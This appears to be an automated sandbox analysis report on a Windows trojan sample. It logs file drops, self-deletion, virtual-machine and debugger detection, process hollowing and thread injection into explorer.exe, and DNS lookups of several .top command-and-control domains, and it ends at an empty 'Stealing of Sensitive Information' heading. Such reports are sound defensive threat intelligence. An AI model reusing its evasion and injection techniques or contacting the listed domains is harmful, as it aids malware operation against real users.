            Source: C:\Users\user\Desktop\qhQ6armJ25.exeProcess created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
            Source: C:\Users\user\AppData\Roaming\gahfeajProcess created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeaj
            Source: C:\Users\user\AppData\Local\Temp\D380.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exe
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeProcess created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe" Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajProcess created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeajJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D380.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exeJump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gahfeajJump to behavior
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D380.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@10/3@10/1
            Source: qhQ6armJ25.exeStatic PE information: More than 200 imports for KERNEL32.dll
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: qhQ6armJ25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: xd?#C:\kotofaru\tenexut.pdbP+C source: qhQ6armJ25.exe, gahfeaj.2.dr
            Source: Binary string: C:\loc vetudigalol\6_di.pdbP+C source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
            Source: Binary string: C:\loc vetudigalol\6_di.pdb source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
            Source: Binary string: C:\kotofaru\tenexut.pdb source: qhQ6armJ25.exe, gahfeaj.2.dr
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_004025F7 pushad ; iretd 1_2_004025FA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_004029A6 push eax; ret 1_2_004029AE
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_1_004025F7 pushad ; iretd 1_1_004025FA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_1_004029A6 push eax; ret 1_1_004029AE
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01D23146 push eax; ret 4_2_01D2314E
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01D22D97 pushad ; iretd 4_2_01D22D9A
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01F24733 push ebp; ret 4_2_01F24734
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01F1FB3B pushad ; iretd 4_2_01F1FB4B
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01F24210 push edi; ret 4_2_01F24239
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_004025F7 pushad ; iretd 5_2_004025FA
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_004029A6 push eax; ret 5_2_004029AE
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 6_2_004025F7 pushad ; iretd 6_2_004025FA
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 6_2_004029A6 push eax; ret 6_2_004029AE
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 6_1_004025F7 pushad ; iretd 6_1_004025FA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 0_2_00420500 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00420500
            Source: initial sampleStatic PE information: section name: .text entropy: 7.04028491917
            Source: initial sampleStatic PE information: section name: .text entropy: 7.02591971436
            Source: initial sampleStatic PE information: section name: .text entropy: 7.04028491917
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gahfeajJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D380.exeJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gahfeajJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Deletes itself after installationShow sources
            Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\qhq6armj25.exeJump to behavior
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\gahfeaj:Zone.Identifier read attributes | deleteJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: qhQ6armJ25.exe, 00000001.00000002.765854041.0000000001F40000.00000004.00000001.sdmpBinary or memory string: ASWHOOK
            Checks if the current machine is a virtual machine (disk enumeration)Show sources
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\explorer.exe TID: 2936Thread sleep count: 615 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 1316Thread sleep count: 385 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 1316Thread sleep time: -38500s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 3080Thread sleep count: 462 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 3080Thread sleep time: -46200s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 6360Thread sleep count: 439 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 660Thread sleep count: 281 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 6364Thread sleep count: 282 > 30Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 615Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 385Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 462Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 439Jump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeSystem information queried: ModuleInformationJump to behavior
            Source: explorer.exe, 00000002.00000000.723940814.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAY
            Source: explorer.exe, 00000002.00000000.749875732.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.723940814.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
            Source: explorer.exe, 00000002.00000000.732593679.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@

            Anti Debugging:

            barindex
            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 0_2_004202D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004202D0
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 0_2_00420500 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00420500
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01D20042 push dword ptr fs:[00000030h]4_2_01D20042
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01F1D6AA push dword ptr fs:[00000030h]4_2_01F1D6AA
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 6_1_00402679 LdrLoadDll,6_1_00402679
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 0_2_004202D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004202D0
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 0_2_0041E390 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041E390
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_0041FDD0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0041FDD0
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_0041DE90 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0041DE90

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\explorer.exeFile created: gahfeaj.2.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: nalirou70.top
            Source: C:\Windows\explorer.exeDomain query: privacytoolzfor-you7000.top
            Source: C:\Windows\explorer.exeDomain query: xacokuo80.top
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\AppData\Local\Temp\D380.exeMemory written: C:\Users\user\AppData\Local\Temp\D380.exe base: 400000 value starts with: 4D5AJump to behavior
            Contains functionality to inject code into remote processesShow sources
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01D20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,4_2_01D20110
            Creates a thread in another existing process (thread injection)Show sources
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeThread created: C:\Windows\explorer.exe EIP: 4F01920Jump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajThread created: unknown EIP: 3151920Jump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeProcess created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe" Jump to behavior
            Source: C:\Users\user\AppData\Roaming\gahfeajProcess created: C:\Users\user\AppData\Roaming\gahfeaj C:\Users\user\AppData\Roaming\gahfeajJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\D380.exeProcess created: C:\Users\user\AppData\Local\Temp\D380.exe C:\Users\user\AppData\Local\Temp\D380.exeJump to behavior
            Source: explorer.exe, 00000002.00000000.712673606.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.731425992.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.745782073.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.749862534.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000002.00000000.731701488.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.745995087.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.714471440.0000000001080000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000002.00000000.738660675.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.759191918.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.724086765.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 0_2_00418430 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00418430

            Stealing of Sensitive Information: